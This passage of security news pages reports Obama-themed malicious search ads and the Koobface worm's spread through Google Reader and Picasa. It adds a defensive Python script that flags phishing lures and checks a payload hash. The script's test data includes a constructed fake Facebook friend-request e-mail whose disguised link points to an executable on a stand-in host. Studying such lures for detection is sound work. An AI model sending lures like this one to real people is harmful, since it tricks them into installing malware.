Scammers were also exploiting the now-completed presidential race using Google’s Sponsored Links. Early Wednesday, searches related to the President Elect returned paid results that included links to websites that tried to install malware on end users’ machines, The Times Online reported. The malicious ads were no longer appearing on Google at time of writing.
The barrage of Obama-themed attacks is part of a broader trend of using current events to trick people into following links that lead to attacks. The US presidential election has been a favorite source of such attacks over the past year, with the names of candidates such as John McCain, Hillary Clinton, Ron Paul and Mike Huckabee all invoked.
Source: cyberinsecure.com
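The two lure campaigns above (the Facebook "added friend" message linking to update.exe, and the fake BBC/CNN video pages pushing Adobe_flash9.exe) share the same shape: a spoofed trusted sender, a link whose visible text or claimed site does not match where it really goes, and a Windows executable at the end. As an added example, not Websense's, Facebook's or cyberinsecure.com's code, the Python routine below applies those checks to a message and compares a retrieved payload against the SHA1 the Websense report gives for update.exe. The sample messages and the host `compromised-blog.example` are constructed for the example.

```python
"""Heuristic triage of lure e-mails: spoofed sender, off-domain or disguised
links, links to executables, and a hash check against a known payload.
Added example; the sample messages below are constructed, not real captures."""
import hashlib
import re
from email import message_from_string
from email.utils import parseaddr
from urllib.parse import urlparse

# SHA1 of "update.exe" as published in the Websense report on this page.
KNOWN_BAD_SHA1 = {"a4dc17d1bcb191af75afedddf60aecbc2af2a37f"}

ANCHOR_RE = re.compile(r'<a\s[^>]*?href="([^"]+)"[^>]*>(.*?)</a>', re.I | re.S)
EXECUTABLE_EXT = (".exe", ".scr", ".pif", ".com", ".bat")


def host_of(url_or_text):
    """Hostname of a URL; bare text such as 'www.facebook.com/x' is tried as http://."""
    text = url_or_text.strip()
    if "://" not in text:
        text = "http://" + text
    return (urlparse(text).hostname or "").lower()


def same_site(host, domain):
    """True when host is domain itself or a subdomain of it."""
    return host == domain or host.endswith("." + domain)


def text_of(msg):
    """Concatenate the decoded text/* parts of a (possibly multipart) message."""
    parts = [msg] if not msg.is_multipart() else [p for p in msg.walk() if not p.is_multipart()]
    chunks = []
    for part in parts:
        if part.get_content_maintype() != "text":
            continue
        raw = part.get_payload(decode=True) or b""
        chunks.append(raw.decode(part.get_content_charset() or "utf-8", "replace"))
    return "\n".join(chunks)


def triage(raw_message):
    """Return a list of (finding, detail) tuples for one RFC 822 message."""
    msg = message_from_string(raw_message)
    _, sender = parseaddr(msg.get("From", ""))
    sender_domain = sender.rsplit("@", 1)[-1].lower() if "@" in sender else ""
    findings = []
    for href, inner in ANCHOR_RE.findall(text_of(msg)):
        target = host_of(href)
        visible = re.sub(r"<[^>]+>", "", inner).strip()
        # 1. The link leaves the domain the From header claims to be from.
        if sender_domain and not same_site(target, sender_domain):
            findings.append(("off-sender-domain link", f"{sender_domain} -> {target}"))
        # 2. The link text is itself a URL, but points somewhere else.
        if re.match(r"^(https?://|www\.)", visible, re.I) and host_of(visible) != target:
            findings.append(("link text/href mismatch", f"{visible} -> {href}"))
        # 3. The target path is a Windows executable.
        path = urlparse(href if "://" in href else "http://" + href).path.lower()
        if path.endswith(EXECUTABLE_EXT):
            findings.append(("link to executable", href))
    return findings


def is_known_payload(data):
    """True when the bytes hash to a published indicator (here, update.exe)."""
    return hashlib.sha1(data).hexdigest() in KNOWN_BAD_SHA1


# Constructed lure, modelled on the campaign described above (not a real capture).
SAMPLE_LURE = """\
From: Facebook <confirm+unrequest@facebook.com>
To: victim@example.net
Subject: You have been added as a friend on Facebook
Content-Type: text/html; charset="utf-8"

<p>Alice added you as a friend on Facebook.</p>
<a href="http://compromised-blog.example/update.exe">http://www.facebook.com/n/?reqs.php</a>
"""

# Constructed benign message for comparison.
SAMPLE_BENIGN = """\
From: Facebook <notification@facebook.com>
To: user@example.net
Subject: Friend request
Content-Type: text/html; charset="utf-8"

<p>Bob wants to be your friend.</p>
<a href="http://www.facebook.com/friends">View request</a>
"""

if __name__ == "__main__":
    for finding, detail in triage(SAMPLE_LURE):
        print(f"{finding}: {detail}")
    print("benign findings:", triage(SAMPLE_BENIGN))
```

The `same_site` check is deliberately crude (it treats any subdomain of the sender's domain as the same site); it flags the two campaigns above because their links leave the claimed domain entirely, but a mail gateway would pair it with reputation data and attachment scanning rather than rely on it alone.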

Old Facebook Worm Using New Ways To Spread By Abusing Google Reader And Picasa Websites


Notice:

Researchers at unified threat management vendor Fortinet noticed that a program similar to the Koobface worm had started using the Google Reader and Picasa websites to spread. In the attack, criminals host images that look like YouTube videos on the Google sites in hopes of tricking victims into downloading malicious Trojan software.
Hackers initially unleashed Koobface in late July, but Facebook's security team soon slowed its spread by blocking the websites that were hosting the malicious Trojan software. That has prompted the criminals to change tactics. In this latest attack they have hosted files that appear to be YouTube videos on Picasa and Google Reader and used Facebook to send them to victims.
The links appear safe because they go to Google sites, but once the victim arrives on the Google Reader or Picasa page, he is invited to click on a video or a web link. The victim is then told he needs to download special codec decompression software to view the video. That software is actually a malicious Trojan Horse program, which is blocked by most anti-virus programs, according to Facebook.
The cyber-criminals behind Koobface may have deliberately misspelled their Facebook messages to further help them evade detection by filters. This latest attack does not use the self-copying worm code that Koobface used last August, but it could easily be added.
Koobface has been a top security concern at Facebook since July. The worm’s creators have used Facebook’s instant messaging feature and also hosted their malicious links on sites such as Tinyurl.com and Bloglines.
Security experts have long warned that the Web 2.0 mash-up model of allowing users to put together their own content from many different sources naturally creates many security problems. In part, this is because it allows anyone to post material on trustworthy domains such as Google.
Facebook is working with Google to shut down the problem, said Facebook spokesman Barry Schnitt.


Founded: 30 Oct 2008